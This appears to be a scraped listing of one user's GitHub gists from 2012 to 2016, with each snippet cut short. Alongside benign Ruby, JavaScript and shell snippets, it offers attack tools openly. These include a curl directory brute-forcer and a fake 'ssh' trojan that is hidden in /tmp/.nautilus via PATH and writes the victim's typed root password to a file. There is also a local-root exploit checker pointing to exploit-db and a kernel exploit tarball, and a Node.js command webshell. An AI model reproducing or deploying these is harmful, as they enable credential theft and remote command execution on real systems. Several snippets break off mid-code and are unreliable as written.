@khakimov
khakimov / gist:4173537
Created November 30, 2012 03:05
https request
require "net/https"
require "uri"
uri = URI.parse("url")
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_PEER # validate the server certificate; VERIFY_NONE disables that check
request = Net::HTTP::Get.new(uri.request_uri)
@khakimov
khakimov / -fno-stack-protector.c
Created December 3, 2012 21:35
stack_protection
0x0000000100000eb0 <test_function+0>: push %rbp
0x0000000100000eb1 <test_function+1>: mov %rsp,%rbp
0x0000000100000eb4 <test_function+4>: mov %edi,-0x4(%rbp)
0x0000000100000eb7 <test_function+7>: mov %esi,-0x8(%rbp)
0x0000000100000eba <test_function+10>: mov %edx,-0xc(%rbp)
0x0000000100000ebd <test_function+13>: mov %ecx,-0x10(%rbp)
0x0000000100000ec0 <test_function+16>: movl $0xb,-0x20(%rbp)
0x0000000100000ec7 <test_function+23>: movb $0x41,-0x1a(%rbp)
0x0000000100000ecb <test_function+27>: pop %rbp
0x0000000100000ecc <test_function+28>: retq
@khakimov
khakimov / gist:4274609
Created December 13, 2012 06:50
http to https
if (document.location.protocol === 'https:') {
  // http to https for <link>
  var links = document.getElementsByTagName('link');
  for (var i = 0; i < links.length; i++) {
    if (links[i].href.indexOf('http:') > -1) {
      var link = links[i].href.replace('http:', 'https:');
      links[i].href = link;
    }
  }
}
@khakimov
khakimov / dirscan.sh
Last active December 11, 2015 01:49
alex, alex we got in! so what next? If you're working with a scope that limits the tools you can install or just want to scan something very fast without installing anything - just use this script with a dir list such as http://zaproxy.googlecode.com/svn/trunk/src/dirbuster/directory-list-2.3-medium.txt
#!/bin/sh
# echo "usage: $0 dirlist target.com"
# can use with https - just use curl -k ...
for i in $(cat $1)
do
echo "dir: $i \tcount: " `curl $2/$i 2>/dev/null | wc -l`
done
# so, just run it
@khakimov
khakimov / ssh
Created January 14, 2013 19:10
script kiddos
#/bin/sh
# add to .bashrc or .profile
# export PATH=/tmp/.nautilus:$PATH
# chmod +x /tmp/.nautilus/ssh
echo "root@10.1.1.1's password: "
stty -echo
read input_variable
stty echo
echo "$input_variable" > /tmp/.nautilus/pass
@khakimov
khakimov / priv_local.py
Created February 1, 2013 02:09
local root? w00t-w00t
import subprocess
def exploitCheck():
# Shout out to Bernardo Damele for letting me use this code! Thanks again!
# Check out his blog at http://bernardodamele.blogspot.com
exploitdb_url = "http://www.exploit-db.com/exploits"
enlightenment_url = "http://www.grsecurity.net/~spender/enlightenment.tgz"
print "[+] Results for local kernel version %s" % kernel
#!/bin/bash
for n in {1..5}
do
  out=$(( n % 2 ))
  if [ "$out" -eq 0 ]
  then
    printf "1\r"
  else
    printf "0\r"
  fi
done
@khakimov
khakimov / gist:5130151
Created March 10, 2013 19:53
node.js command webshell
var sys = require('sys'),
exec = require('child_process').exec,
child,
http = require('http');
child = function(res, cmd) {
exec(cmd,
function (error, stdout, stderr) {
res.end(stdout);
if (error !== null) {
require 'json'
require 'open-uri'
url = 'https://www.theranos.com/api/tests'
# URI.open is the open-uri entry point; bare Kernel#open no longer handles URLs on Ruby 3+
resp = URI.open(url).read
json_tests = JSON.parse(resp)
all_tests_price = 0
json_tests.each do |x|
  all_tests_price += x["TheranosPrice"].to_f
end
@khakimov
khakimov / gist:9aee5f3914b98e06350d
Created January 20, 2016 07:43
git the hard way
# mkdir -p logs/refs/heads
# mkdir -p refs/remotes/origin
# mkdir -p refs/heads
# mkdir -p info
files=(
"HEAD"
"objects/info/packs"
"description"
"config"